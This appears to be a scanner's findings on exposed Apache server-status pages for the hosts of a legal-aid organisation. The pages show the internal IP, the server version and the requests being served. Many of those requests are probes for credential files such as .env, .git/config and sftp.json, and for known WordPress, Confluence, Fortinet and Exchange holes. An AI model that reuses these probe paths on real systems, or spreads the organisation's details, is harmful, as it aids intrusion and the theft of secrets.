70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 28-53278260/2/2219_ 0.06360.00.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53-0/0/2082. 0.00100.00.0048.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53278320/2/1950_ 0.5837820.00.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278330/1/1821_ 0.1333550.00.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817W 0.01200.00.0050.54 70.132.4.157http/1.1intranet.alas.org:8080GET / HTTP/1.1 33-53278353/4/2897K 0.030304.60.0155.69 70.132.4.89http/1.1esign.alas.org:8080GET /_all_dbs HTTP/1.1 34-53278360/2/1902_ 0.5837730.00.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278374/5/1420K 0.00104.20.0123.35 70.132.4.95http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 36-53278462/3/1611K 0.101106843.00.0538.90 205.251.218.133http/1.1survey.alas.org:8080GET / HTTP/1.1 37-53278473/4/1940W 0.01103.40.0124.95 70.132.4.95http/1.1events.alas.org:8080GET / HTTP/1.1 38-53278800/2/1388_ 0.5837520.00.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/2/1460_ 0.0718440.00.0923.63 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 40-53278821/2/1375K 0.14118221.00.0118.01 52.46.36.134http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 41-53279120/1/551_ 0.64261890.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279137/22/532K 0.021911.20.119.00 70.132.4.67http/1.1secure.alas.org:8080GET / HTTP/1.1 43-53279182/2/729K 0.56102.00.009.01 70.132.4.67http/1.1on.alas.org:8080GET /about HTTP/1.1 44-53279233/3/648K 0.58004.30.006.60 70.132.4.67http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 45-53279243/3/863W 0.56103.10.0014.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 46-53279253/4/535K 0.18222124.50.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279265/7/491W 0.02206.60.046.20 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 48-53279273/3/510K 0.57203.00.007.33 70.132.4.67http/1.1secure.alas.org:8080GET /about HTTP/1.1 49-53279287/7/368K 0.17008.80.014.74 70.132.4.67http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 50-53279296/6/636K 0.110048.20.059.89 70.132.4.67http/1.1esign.alas.org:8080GET /.env HTTP/1.1 51-53279305/5/500K 0.18005.40.017.45 70.132.4.67http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 52-53279317/7/474K 0.08079112.10.015.98 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 53-53279404/4/392K 0.56019.90.019.74 70.132.4.67http/1.1on.alas.org:8080GET /server-status HTTP/1.1 54-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea42c772be
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:13 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 15 seconds Server load: 6.10 1.28 0.41 Total accesses: 671901 - Total Traffic: 11.7 GB CPU Usage: u117.11 s14.23 cu0 cs0 - .00285% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 125 requests currently being processed, 11 idle workers KKWKWKKKKKKKKK_WWKK_WKKK_CKC_.__WK_KKW__K_KKKWKWKKKKWKKKKKKKKKWK KKKKKKKKWWWKWKKWKKWWKWWKKWKWWKWWKWKKWWKKKKWKKKKWWKWWWWWWWKW_KKKK WKKKKWKKK............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276764/18/45893K 1.260615.70.14831.33 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 1-53276494/28/46847K 1.11209.90.32901.10 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 2-53277374/7/45358W 0.60005.50.06810.66 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 3-53270584/42/42335K 4.20085551.00.53751.84 70.132.4.95http/1.1survey.alas.org:8080GET / HTTP/1.1 4-53274933/28/43081W 1.87004.50.33696.70 70.132.4.89http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 5-53276814/25/42354K 1.29005.60.13726.13 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-53277452/3/39191K 0.14223422.00.01749.01 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-53274943/23/38946K 1.590546.90.14745.13 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 8-53276823/17/34616K 0.782043.30.16719.01 70.132.4.67http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 9-53276653/26/32901K 1.74003.60.33586.80 70.132.4.89http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 10-53276664/27/32815K 1.27105.50.32595.51 70.132.4.95http/1.1on.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 11-53277463/7/26109K 0.63085243.50.05471.32 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 12-53277554/18/24026K 1.18207.60.09453.74 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 13-53277561/8/20987K 0.352278232.10.05343.21 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-53277610/3/17649_ 0.7036920.00.01280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12500.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09400.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277764/5/9602K 0.24104.30.01127.61 70.132.4.95http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 18-53277773/5/8553K 0.02203.50.01103.55 70.132.4.89http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 19-53277780/4/6504_ 0.42027500.00.04112.42 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 20-53277790/2/6757W 0.00400.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277803/4/5221K 0.04203.20.09102.36 70.132.4.89http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 22-53277813/4/6941K 0.05203.60.2095.16 70.132.4.89http/1.1on.alas.org:8080GET / HTTP/1.1 23-53277861/3/5062K 0.251290032.10.04105.46 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278150/1/5176_ 0.1232750.00.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278161/2/2527C 0.18000.20.0152.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53273601/27/2863K 2.64301.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278211/2/2314C 0.1405683.60.0151.73 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 28-53278260/2/2219_ 0.06360.00.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53-0/0/2082. 0.00100.00.0048.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53278320/2/1950_ 0.5827820.00.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278330/1/1821_ 0.1333550.00.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817W 0.01200.00.0050.54 70.132.4.157http/1.1intranet.alas.org:8080GET / HTTP/1.1 33-53278353/4/2897K 0.030304.60.0155.69 70.132.4.89http/1.1esign.alas.org:8080GET /_all_dbs HTTP/1.1 34-53278360/2/1902_ 0.5827730.00.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278374/5/1420K 0.00004.20.0123.35 70.132.4.95http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 36-53278462/3/1611K 0.100106843.00.0538.90 205.251.218.133http/1.1survey.alas.org:8080GET / HTTP/1.1 37-53278473/4/1940W 0.01003.40.0124.95 70.132.4.95http/1.1events.alas.org:8080GET / HTTP/1.1 38-53278800/2/1388_ 0.5827520.00.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/2/1460_ 0.0718440.00.0923.63 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 40-53278821/2/1375K 0.14118221.00.0118.01 52.46.36.134http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 41-53279120/1/551_ 0.64161890.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279137/22/532K 0.020911.20.119.00 70.132.4.67http/1.1secure.alas.org:8080GET / HTTP/1.1 43-53279182/2/729K 0.56102.00.009.01 70.132.4.67http/1.1on.alas.org:8080GET /about HTTP/1.1 44-53279232/2/647K 0.5811273.30.006.60 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 45-53279243/3/863W 0.56003.10.0014.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 46-53279253/4/535K 0.18222124.50.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279265/7/491W 0.02206.60.046.20 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 48-53279273/3/510K 0.57103.00.007.33 70.132.4.67http/1.1secure.alas.org:8080GET /about HTTP/1.1 49-53279286/6/367K 0.17207.80.014.74 70.132.4.67http/1.1secure.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 50-53279295/5/635K 0.112746.10.059.89 70.132.4.67http/1.1secure.alas.org:8080GET / HTTP/1.1 51-53279304/4/499K 0.18222704.40.007.45 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-53279316/6/473W 0.00006.30.015.98 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 53-53279403/3/391K 0.56203.10.009.73 70.132.4.67http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 54-53279692/2/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea0af817c6
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 00:04:38 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 17 hours 11 minutes 48 seconds Server load: 23.63 21.88 21.14 Total accesses: 639077 - Total Traffic: 28.5 GB CPU Usage: u206.84 s13.44 cu0 cs0 - .0218% CPU load .631 requests/sec - 29.5 kB/second - 46.8 kB/request 40 requests currently being processed, 0 idle workers WWWKWKWWWWKKWWWWWWWWWWWWKWWWWWS....K....W.K....W.......W........ ..K...K.......W.W.W............................................. ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1179070/0/35034W 15.65400.00.001636.75 70.132.63.165http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-1139861/3/35302W 0.54209.60.021599.81 15.158.41.205http/1.1atlantalegalaid.org:8080POST /alas/wp-login.php HTTP/1.1 2-1181580/0/26277W 2.31300.00.001283.95 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-1181873/3/26740K 0.17003.70.001303.61 70.132.63.132http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-1185071/1/31530W 0.00001.00.001443.12 70.132.63.132http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 5-1185082/2/23739K 0.09002.40.001127.02 70.132.63.165http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 6-1185090/0/30224W 3.05200.00.001372.54 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-1185290/0/22735W 0.06200.00.001117.18 70.132.63.86http/1.1elearning.alas.org:8080GET / HTTP/1.1 8-1188120/0/28235W 1.51100.00.001339.97 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-11281411/11/20825W 1.46501.00.031028.95 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-11310725/15/19251K 1.590010.40.18900.67 70.132.63.132http/1.1elearning.alas.org:8080GET /s/6323e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 11-1188131/1/18749K 0.0512371.40.00893.17 70.132.63.165http/1.1secure.alas.org:8080GET / HTTP/1.1 12-1188230/0/17653W 0.73100.00.00891.17 70.132.63.86http/1.1events.alas.org:8080GET / HTTP/1.1 13-1188540/0/16843W 3.84100.00.00865.25 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 14-1188550/0/21646W 1.84100.00.00960.03 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 15-1188820/0/14761W 21.85100.00.00749.43 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 16-1189040/0/19075W 1.66100.00.00887.47 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-1189060/0/17208W 0.39100.00.00833.32 70.132.63.86http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-1191170/0/11392W 1.20000.00.00551.36 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 19-1191180/1/16322W 0.00000.00.00754.56 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-1191590/0/16406W 17.18000.00.00669.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 21-1191610/0/10807W 0.56000.00.00525.03 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 22-1191950/0/14140W 3.00000.00.00602.84 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 23-1191960/0/13740W 0.80000.00.00565.22 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 24-11317433/8/12082K 2.404160313.60.03555.65 70.132.31.138http/1.1survey.alas.org:8080GET /index.php/admin/authentication/sa/login HTTP/1.1 25-11317441/12/8104W 1.98501.00.03353.63 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 26-11317681/8/8557W 1.02501.00.02357.71 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 27-11317695/14/7511W 4.33005.80.03278.50 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 28-1192180/0/7237W 0.00000.00.00271.47 70.132.63.86http/1.1elearning.alas.org:8080GET / HTTP/1.1 29-1192190/0/3696W 0.34000.00.00178.44 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 30-1100/0/6276S 0.612400.00.00261.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-11-0/0/3216. 0.007100.00.00136.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-11-0/0/6167. 0.472700.00.00252.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7279. 0.016800.00.00308.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3605. 0.016300.00.00151.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11321883/12/5861K 1.97048244.10.21216.66 70.132.63.132http/1.1secure.alas.org:8080GET / HTTP/1.1 36-11-0/0/3331. 21.285200.00.00180.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-11-0/0/3087. 0.632200.00.00118.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5508. 0.393500.00.00236.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5345. 0.008500.00.00201.90 70.132.63.165http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 40-11271842/96/5724W 22.81502.11.48294.24 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 41-11-0/0/3620. 0.005800.00.00118.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11327558/14/1755K 1.40008.70.6957.22 70.132.63.132http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 43-11-0/0/1987. 0.005700.00.0051.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1571. 1.303200.00.0049.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11-0/0/1834. 0.015600.00.0063.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-11-0/0/1458. 0.467300.00.0046.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114061/16/1108W 2.93001.10.4729.69 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 48-11-0/0/1122. 0.594200.00.0027.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/917. 1.095300.00.0043.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11-0/0/1399. 0.293400.00.0048.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-11-0/0/1322. 0.318700.00.0041.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/904. 0.832600.00.0022.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1072. 0.487200.00.0043.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1056. 3.331900.00.0047.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-118060/9/1118W 2.15000.00.2136.63 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feae6273c78
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:05 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 24 seconds Server load: 2.50 0.54 0.17 Total accesses: 5117133 - Total Traffic: 242.1 GB CPU Usage: u31.22 s3.86 cu0 cs0 - .000354% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 107 requests currently being processed, 0 idle workers WWWWWWKWWWKWWWWWWWWWWWWWWKKWWWKWKWWWWWWKWWWWWWWWWWKWWWWWWWWKWWKW WKWWWKWKWWWWWWWKKWKWWKWKWKWWKKKWWWWWWWWWWWSW.................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208261/1/315813W 0.18300.90.0015274.52 130.176.208.180http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 1-114208364/4/307281W 0.082044.60.0415603.86 130.176.208.148http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 2-114202774/11/296200W 0.3010231.70.4714399.66 130.176.208.180http/1.1events.alas.org:8080GET /server-status HTTP/1.1 3-114202782/9/291720W 0.2810229.60.2414074.69 130.176.208.148http/1.1events.alas.org:8080GET / HTTP/1.1 4-114202875/16/280071W 0.172050.20.0714108.13 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-114208370/0/270950W 0.00400.00.0013303.78 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 6-114208466/6/257849K 0.140072.60.0712980.21 130.176.208.180http/1.1on.alas.org:8080GET /login.action HTTP/1.1 7-114203472/10/249542W 0.2920229.60.2412283.25 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 8-114208472/2/236970W 0.092042.50.0411522.06 130.176.208.180http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 9-114208481/1/226037W 0.00301.00.0011118.77 130.176.208.180http/1.1atlantalegalaid.org:8080GET /s/31332e33322e39392e3335/_/;/META-INF/maven/com.atlassian. 10-114200192/28/214611K 2.13002.51.4710231.81 130.176.208.180http/1.1elearning.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 11-114208490/0/192015W 0.00300.00.009331.32 130.176.208.180http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-114203640/4/176706W 0.01500.00.018770.57 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 13-114208752/2/168047W 0.07106.90.018058.75 130.176.208.138http/1.1atlantalegalaid.org:8080GET /.DS_Store HTTP/1.1 14-114208762/2/156064W 0.080011.80.017530.90 130.176.208.148http/1.1elearning.alas.org:8080GET / HTTP/1.1 15-114203841/4/149535W 0.263032.10.147254.50 130.176.208.180http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-114203854/7/134165W 0.460066.80.166324.95 130.176.208.180http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 17-114196100/76/112406W 7.71000.01.685336.09 130.176.208.138http/1.1esign.alas.org:8080GET / HTTP/1.1 18-114208772/2/103350W 0.00202.10.005128.80 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-114199137/50/93816W 2.792055.72.534748.63 130.176.208.180http/1.1events.alas.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 20-114208782/2/93899W 0.00006.90.014523.83 130.176.208.148http/1.1survey.alas.org:8080GET /about HTTP/1.1 21-114208791/3/86192W 0.08005.90.014051.44 130.176.208.180http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 22-114204012/5/84817W 0.3600234.40.254104.91 130.176.208.180http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 23-114204061/3/79166W 0.253032.10.103708.97 130.176.208.180http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 24-114208802/2/71768W 0.01105.60.013443.05 130.176.208.180http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 25-114204245/7/38025K 0.410083.20.221723.77 130.176.208.138http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 26-114204255/7/30105K 0.390081.50.091388.64 130.176.208.138http/1.1on.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 27-114204300/3/27630W 0.06500.00.091253.80 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-114204358/10/25408W 0.092013.70.021161.23 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 29-114200924/23/23708W 1.640080.34.741038.57 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 30-114204406/8/25345K 0.400037.90.041138.81 130.176.208.180http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 31-114208812/2/23301W 0.01002.50.001016.81 130.176.208.148http/1.1survey.alas.org:8080GET / HTTP/1.1 32-114208822/3/24125K 0.09002.30.041138.34 130.176.208.180http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 33-114209221/1/23755W 0.00101.00.001123.81 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-114204525/7/24933W 0.103045.80.051086.46 130.176.208.180http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 35-114204619/11/26412W 0.191055.60.061149.01 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-114204623/5/22943W 0.391045.40.061008.31 130.176.208.180http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 37-114209231/1/23494W 0.00101.20.001057.31 130.176.208.138http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 38-114204673/5/23017W 0.242034.20.051015.32 130.176.208.180http/1.1events.alas.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 39-114209242/2/22432K 0.00002.10.00936.86 130.176.208.148http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 40-114204726/8/23689W 0.350078.60.10997.74 130.176.208.148http/1.1events.alas.org:8080GET /config.json HTTP/1.1 41-114204770/3/4958W 0.03500.00.02210.14 130.176.208.138http/1.1intranet.alas.org:8080GET / HTTP/1.1 42-114209250/0/2822W 0.00100.00.00108.29 130.176.208.138http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 43-114204872/4/3165W 0.242033.20.08137.28 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-114205046/8/1989W 0.192016.40.02129.48 130.176.208.180http/1.1events.alas.org:8080GET /.env HTTP/1.1 45-114205054/6/1930W 0.18204.50.0495.15 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 46-114209260/0/1812W 0.00100.00.0048.06 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 47-114205156/8/1941W 0.261056.60.0684.48 130.176.208.180http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 48-114209270/0/1562W 0.00100.00.0052.62 130.176.208.180http/1.1survey.alas.org:8080GET / HTTP/1.1 49-114209281/1/1459W 0.00001.10.0055.34 130.176.208.148http/1.1events.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 50-114209294/4/1292K 0.00004.80.0057.45 130.176.208.180http/1.1elearning.alas.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 51-114209301/1/1483W 0.00101.10.0057.39 130.176.208.138http/1.1events.alas.org:8080GET /telescope/requests HTTP
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea5fab7cce
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:02 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 21 seconds Server load: 0.02 0.02 0.00 Total accesses: 5116966 - Total Traffic: 242.0 GB CPU Usage: u29.45 s3.48 cu0 cs0 - .000332% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 62 requests currently being processed, 0 idle workers WKWWWWWKWWKWW..WWW.K..WW.WWWWWW...WWW.K.WW.KWK.K....W.WWKWKKKW.W ...W.WKKWWCWKW......W.W...WK........K...K..W.................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208261/1/315813W 0.18000.90.0015274.52 130.176.208.180http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 1-114208364/4/307281K 0.080044.60.0415603.86 130.176.208.148http/1.1elearning.alas.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 2-114202770/7/296196W 0.03300.00.2414399.44 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 3-114202780/7/291718W 0.00300.00.0214074.47 130.176.208.148http/1.1events.alas.org:8080GET / HTTP/1.1 4-114202874/15/280070W 0.100044.40.0714108.13 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 5-114208370/0/270950W 0.00100.00.0013303.78 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 6-114208460/0/257843W 0.00000.00.0012980.14 130.176.208.180http/1.1survey.alas.org:8080GET / HTTP/1.1 7-114203471/9/249541K 